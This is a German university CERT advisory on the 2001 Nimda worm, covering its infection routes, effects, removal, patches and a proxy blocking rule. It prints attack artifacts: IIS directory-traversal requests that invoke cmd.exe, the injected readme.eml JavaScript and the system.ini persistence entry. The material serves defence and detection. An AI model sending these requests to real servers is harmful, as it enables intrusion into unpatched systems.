Ein Wurm namens Nimda nutzt scheinbar mehrere Schwachstellen von Microsoft Windows zur Verbreitung aus. Neben mehreren Schwachstellen des IIS-Webservers findet eine Verbreitung über ein E-Mail-Attachment (README.EXE) statt. Ferner werden durch manipulierte Webseiten (die mit einer readme.eml ersetzt wurden) Systeme mit ungepachtem Internet Explorer, bei dem Besuch der Webseite mit dem Internet Explorer, infiziert.

Betroffene Systeme

• Microsoft Windows IIS Webserver
• Microsoft Internet Explorer 5.x
• Microsoft Outlook (Express) 5.x bzw. E-Mail-Clients die zur Darstellung von HTML-E-Mails auf den Internet Explorer 5.x zurückgreifen

Einfallstor

• HTTP-Anfragen an einen IIS-Server.
• E-Mail-Attachment mit Mime-Typ audio/x-wav
• manipulierte Webseite (readme.eml), die eine Schwachstelle im Internet Explorer zur Ausführung des Programmcodes ausnutzt.
• Netzlaufwerk-Freigaben

Auswirkung
Nach dem derzeitigen Stand der Analyse sind folgende Auswirkungen sehr wahrscheinlich:

• Die Guests-Gruppe und der Guest-Account wird aktiviert und in die lokale Administrator-Gruppe aufgenommen.
• Unter \Program Files\Common Files\msadc werden die Dateien root.exe, TFTP129, TFTP68, TFTP192 angelegt. Dateien der Form TFTP12345 (57.344 bytes) werden auch in den Verzeichnissen \Inetpub\scripts und \Inetpub\wwwroot angelegt (nur bei IIS Webservern).
• TFTP-Download der Datei admin.dll (57.344 bytes), welche scheinbar auf C:\, D:\, E:\ und dem Web root Verzeichnis abgelegt wird.
• In verschiedenen Ordnern wird die Datei riched20.dll (57.344 bytes) abgelegt, z.B. %windir%\system32
• Unter %WINDIR% werden die Dateien load.exe, mmc.exe (57.344 bytes) und cmd.exe(208.144 bytes) abgelegt.
• Die Datei system.ini wird verändert und shell=explorer.exe load.exe -dontrunold eingetragen, wodurch der Wurm beim Systemstart ausgeführt wird.
• Die Netzlaufwerk-Freigabe c$ für C:\ wird eingerichtet (wird ohne reboot aktiviert).
• Die Netzlaufwerk-Freigaben für alle lokalen Partitionen werden als versteckte Freigaben (z.B. D$) eingerichtet (aber erst nach einem reboot aktiviert)
• Eine Datei namens readme.eml wird auf infizierten Webservern abgelegt, welche eine Schwachstelle im Internet Explorer zur Verbreitung ausnutzt. (Diese Dateien wurden durch den Internet Explorer automatisch ausgeführt).
• Es werden index, readme, main, default .html,.htm,.asp Webseiten um folgenden Javascript Code erweitert: <html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html>, welcher die Datei readme.eml beim Aufruf herunterlädt und bei verwundbaren Clients ausführt.
• Es werden in jedem Ordner, für den Schreibrechte bestehen, Dateien der Form xxxxxxx.eml (jeweils 79.225 bytes) bzw. xxxxxxx.nws abgelegt. Das Verhältnis steht dabei 95% eml- zu 5% nws-Dateien. Diese Dateien enthalten die Datei README.EXE, welche die Schadensroutine des Wurms enthält.
• Es werden temporäre Dateien in Format mepXXX.tmp u. mepXXX.temp.exe im %WINDIR%-Verzeichnis angelegt, die offentsichtlich von den laufenden Scan- bzw. Infektionsprozessen stammen.
• Es werden zahlreiche Schlüssel/Werte in der Registry verändert/hinzugefügt.
• Es werden ausführbare Dateien angelegt bzw. verändert (z.B. eine Datei Iexplore.exe, dabei werden u.U. Eigenschaften des NTFS-Dateisystems genutzt, um die Entfernung zu erschweren).
• Der Wurm versucht, verwundbare IIS-Systeme zwecks Weiterverbreitung zu finden.
• Durch die offenbar bereits sehr große Zahl an schon infizierten Systemen erzeugt dieser Wurm in verschiedenen Netzen extrem hohe Netzlast, die zu Betriebseinschränkungen führen kann (Distributed Denial of Service Attack).
  Die Ziel-IP-Adressen für die weitere Verbreitung von Webserver zu Webserver werden nach folgendem Muster ausgewählt:
  • 50% IP-Adressen, die mit den ersten beiden Oktets der eigenen IP-Adresse übereinstimmen
  • 25% IP-Adressen, die mit dem ersten Oktet der eigenen IP-Adresse übereinstimmen
  • 25% IP-Adressen, die per Zufallsprinzip ausgewählt werden

Typ der Verwundbarkeit
design flaw

Gefahrenpotential
sehr hoch
(Hinweise zur Einstufung des Gefahrenpotentials.)

Beschreibung
Offenbar verbreitet sich ein neuer Wurm, der mehrere bereits bekannte Schwachstellen im IIS Webserver sowie dem Internet Explorer zur Verbreitung ausnutzt.

Im Binärcode des Wurms befindet sich folgender Hinweis:

Concept Virus(CV) V.5, Copyright(C)2001  R.P.China

Die Schwachstelle des Internet Explorers bei der Verarbeitung von falschen MIME Types wird von dem Wurm auch bei der Betrachtung von arglistigen Webseiten ausgenutzt. . So wird beim Besuch eines mit dem Wurm infizierten Webservers die Datei readme.eml ausgeführt, welche bei ungepachten Internet Explorern den eigentlichen Wurm (README.EXE) automatisch auf dem die Webseite besuchenden System ausführt (bzw. je nach Sicherheitseinstellung des Internet Explorers eine Interaktion des die Webseite Besuchenden erfordert).

Der Wurm kopiert sich selbst (README.EML) in alle Verzeichnisse des befallenen Systems und auf Netzlaufwerk-Freigaben, auf die der Zugriff gestattet ist.

Der Wurm versucht IIS-Webserver, die mit dem CodeRedII-Wurm infiziert sind, zu befallen. Dabei werden typischerweise HTTP-Requests der folgenden Form erzeugt:

• GET /scripts/root.exe?/c+dir HTTP/1.0
• GET /MSADC/root.exe?/c+dir HTTP/1.0
• GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0
• GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0

• GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
• GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
• GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
• GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0

• GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
• GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
• GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0
• GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
• GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
• GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
• GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
• GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0

Bekannte Aliases

• Code Rainbow
• Concept Virus(CV) V.5
• W32.Nimda.A@mm
• W32/Minda@MM
• PE_NIMDA.A

Entfernung des Wurms
Der Wurm wird sich (zumindest auf Server-Systemen) vermutlich nie zuverlässig automatisch entfernen lassen. Aus diesem Grund ist eine Neuinstallation des Systems von einem vertrauenswürdigen Datenträger und die Einspielung der neuesten Sicherheitspatches erforderlich - ohne das System vorher an das Internet oder das lokale Netz zu hängen, um eine erneute Infektion zu vermeiden. Danach sollte der Datenbestand vom Backup zurückgespielt werden und mit einem aktuellen Virenscanner überprüft werden. (Siehe auch den separaten Artikel zur Entfernung des Wurmes.) Zahlreiche Anti-Viren-Hersteller stellen dafür ein Update zur Verfügung:

• NAI: http://vil.nai.com/vil/virusSummary.asp?virus_k=99209
• Sophos: http://www.sophos.com/virusinfo/analyses/w32nimdaa.html
• Symantec: http://www.sarc.com/avcenter/venc/data/w32.nimda.a@mm.html
• F-Secure: http://www.f-secure.com/v-descs/nimda.shtml
• Trend Micro: http://www.antivirus.com/vinfo/virusencyclo/default5.asp?VName=PE_NIMDA.A

Gegenmaßnahmen
Die von dem neuen Wurm verwendeten Schwachstellen sind seit längerer Zeit bekannt, Microsoft stellt Sicherheitsupdates zur Verfügug.

Für den Internet Explorer ist zumindest folgender Patch notwendig:

• Internet Explorer 5.01
  http://www.microsoft.com/windows/ie/download/critical/q295106/default.asp
• Internet Explorer 5.5
  http://www.microsoft.com/windows/ie/download/critical/q299618/default.asp

Für den IIS-Webserver ist zumindest folgende Patch notwendig:

• Microsoft IIS 4.0:
  http://www.microsoft.com/Downloads/Release.asp?ReleaseID=32061
• Microsoft IIS 5.0:
  http://www.microsoft.com/Downloads/Release.asp?ReleaseID=32011

Eine tabellarische Übersicht der Microsoft Windows Security Patches (engl. und dt.) mit Links zum Mirror der Security Patches auf dem ftp-Server der Universität Stuttgart befindet sich unter:

• Windows NT 4.0:
  http://cert.uni-stuttgart.de/winnt-updates.php
• Windows 2000:
  http://cert.uni-stuttgart.de/win2000-updates.php

• http://cert.uni-stuttgart.de/ms-ie-updates.php

Installieren Sie die aktuellen Anti-Virus-Updates.

Die Universität Stuttgart besitzt eine Campuslizenz für den McAfee Virenscanner, der in der aktuellen Version diesen Virus zuverlässig erkennt. Näheres hierzu erfahren Sie unter

• http://wb.rus.uni-stuttgart.de/viren/ (Zugriff nur für Mitglieder der Universität Stuttgart)

Workaround
Benutzer des Internet Explorers sollten die fehlenden Sicherheitsupdates installieren und JavaScript bzw. Active Scripting deaktivieren.

Netzwerk-Administratoren könnten bei der Verwendung eines HTTP-Proxy-Server Dateien mit der Endung .eml sperren. Bei squid.conf würde dies beispielsweise so sehen:

acl worm urlpath_regex -i \.eml$
http_access deny worm

Weitere Information zu diesem Thema

• CERT® Advisory CA-2001-26 Nimda Worm
• http://www.incidents.org/react/nimda.php
• Microsoft Information on the "Nimda" Worm
• Slashdot Meldung
• Incident Meldung
• Georgi Guninski security advisory #9, 2000 IE and Outlook 5.x allow executing arbitrary programs using .eml files

Weitere Artikel zu diesem Thema:

• [MS/IIS] Entfernung des Nimda-Wurmes (2001-09-21)
  Wegen einiger Aspekte des Nimda-Wurmes gestaltet sich das Entfernen des Nimda-Wurmes von einem betroffenen System äußerst schwierig.
• [HP, Lexmark/Drucker] DoS-Anfälligkeit im Zuge von Nimda (2001-09-21)
  Im Zuge der zahlreichen HTTP-Requests, die im Gefolge des Nimda-Wurmes auftauchten, stellte sich heraus, daß einige Drucker für DoS-Angriffe anfällig sind.
• [MS/IIS] Neuer Wurm tritt in die Fußstapfen von Code Red (Update) (2001-08-05)
  Ein neuer Wurm ist gesichtet worden, der dieselbe Schwachstelle wie Code Red zur Verbreitung nutzt, aber darüberhinaus Schadensroutinen enthält. Die "CodeRedII" genannte Variante installiert Backdoors, wodurch Angreifer leichte Kontrolle über das System erlangen können.
• [MS/IIS] erneuter Ausbruch des "Code Red"-Wurmes befürchtet (2001-07-30)
  Es wird für den 01. August mit einem erneuten Ausbruch des "Code Red" Wurms gerechnet. Dieser Wurm befällt Microsoft IIS Webserver über die .ida ISAPI Schwachstelle (MS01-033).
• [MS/IIS] Würmer nutzen Microsoft IIS Schwachstellen aus (UPDATE) (2001-07-18)
  Es werden mehrere Würmer gemeldet, die sich selbständig durch Kompromittierung von Microsoft IIS Webservern verbreiten.
• [MS/IE/Outlook] Schwachstelle bei der Verarbeitung von falschen MIME Types (2001-03-30)
  Durch eine Schwachstelle bei der Verarbeitung von MIME Types kann beim Betrachten von HTML E-Mails oder arglistigen Webseiten beliebiger Programmcode ausgeführt werden.

Hinweis
Die in diesem Text enthaltene Information wurde für die Mitglieder der Universität Stuttgart recherchiert und zusammengestellt. Die Universität Stuttgart übernimmt keinerlei Haftung für die Inhalte. Dieser Artikel darf ausschließlich in unveränderter Form und nur zusammen mit diesem Hinweis sowie dem folgenden Copyrightverweis veröffentlicht werden. Eine Veröffentlichung unter diesen Bedingungen an anderer Stelle ist ausdrücklich gestattet.

Copyright © 2022 RUS-CERT, Universität Stuttgart, https://cert.uni-stuttgart.de/